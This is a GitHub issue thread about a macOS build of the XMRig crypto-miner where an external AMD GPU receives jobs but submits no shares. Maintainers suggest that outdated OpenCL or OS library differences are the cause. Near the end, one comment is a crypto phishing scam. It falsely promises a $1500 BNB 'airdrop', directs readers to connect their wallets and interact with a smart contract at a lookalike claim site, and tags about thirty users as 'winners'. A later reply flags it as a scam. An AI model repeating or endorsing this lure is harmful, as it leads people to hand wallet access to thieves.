### ISSUE TITLE
XMRig keeps receiving jobs, but does not accept any

### ISSUE THREAD

**Issue by Chowdary1999** [ganzocrypt/xmrig-macos#3]
**Describe the bug**

**To Reproduce**
Steps to reproduce the behavior.

**Expected behavior**

**Required data**
 - Miner log as text or screenshot
 - Config file or command line (without wallets)
 - OS: [e.g. Windows]
 - For GPU related issues: information about GPUs and driver version.

**Additional context**
<img width="842" alt="Screen Shot 2021-11-09 at 8 49 41 pm" src="https://user-images.githubusercontent.com/51407838/140901701-512ed7a8-d66d-4d98-a96a-6268bb81494a.png">

Device : Apple MacBook Pro
Software version : macOS Monterey Version 12.0
Procesor : 2.3 GHz Dual-Core Intel Core i5
E-gpu connected : AMD Radeon RX580
Open CL version : 1.2

**Comment by hackebike** [comment]
The OpenCL is old on mac so the support is very flaky, but looks like is mining, no? did you wait that unminable reports it, it takes sometime.

**Comment by Chowdary1999** [comment]
I ran the miner for good couple of hours, but my ogpu fans don't even run, so I was assuming that the miner wasn't working, since there are no miner reports on unmovable even after couple of hours

**Comment by hackebike** [comment]
ok, from what I know the miner has no support anymore because OpenCL is too old. What you can try is the official xmrig miner since they add back support for macos, but did not test it. last resort is to recompile it for you os version.

**Comment by ganzocrypt** [comment]
The OpenCL is old on mac so the support is very flaky, but looks like is mining, no? did you wait that unminable reports it, it takes sometime.

ok, from what I know the miner has no support anymore because OpenCL is too old. What you can try is the official xmrig miner since they add back support for macos, but did not test it. last resort is to recompile it for you os version.

**Comment by Chowdary1999** [comment]
https://github.com/xmrig/xmrig/issues/2663 I am having this issue when using Xmrig official

**Comment by Chowdary1999** [comment]
the interesting part is that the Xmrig and my egpu works fine on my other MacBook Pro with i9 processor and 64gb ram but does not work on this current MacBook Pro with i5 processor and 8gb ram

**Comment by ganzocrypt** [comment]
same OS version? I compile it on [Catalina](https://github.com/ganzocrypt/xmrig-macos/releases) 
But I know there are issues on different OS versions, probably libs differences.

**Comment by Chowdary1999** [comment]
Yep exactly the same OS and build, tried downgrading to the previous versions as well and the results are the same, and that's very strange

**Comment by ganzocrypt** [comment]
ok that's strange, maybe something to do with different GPU? Just a guess !

**Comment by Chowdary1999** [comment]
I was using the same setup Razer Core X with AMD Radeon RX 580 as the gpu card, but for some reason when open CL is compiling on my 13" MacBook it is not assigning the threads required properly and when I manually assign the threads it doesn't submit the shares coz its not mining

**Comment by highpolar-shubham** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @alex99duil, @alexandrekientzy, @xeoneux, @Captainfl4me, @Qiamast, @cenoo, @sopay, @madnetmad, @olahelgedagsrud, @pamallin, @jamal737, @dirdr, @marccoll, @g8d3, @rogarcia, @goodlifeinc, @stonecurrier, @RafaelAPB, @HilalGozutok, @GrimblyGorn, @lcosta, @adeleon1054, @gregorypierce, @BlackHoleExelion, @mathis-deconchat, @martintama, @sgx3live, @earthonion, @Arthurr00, @hhoomm

**Comment by earthonion** [comment]
This is a scam, report and disregard
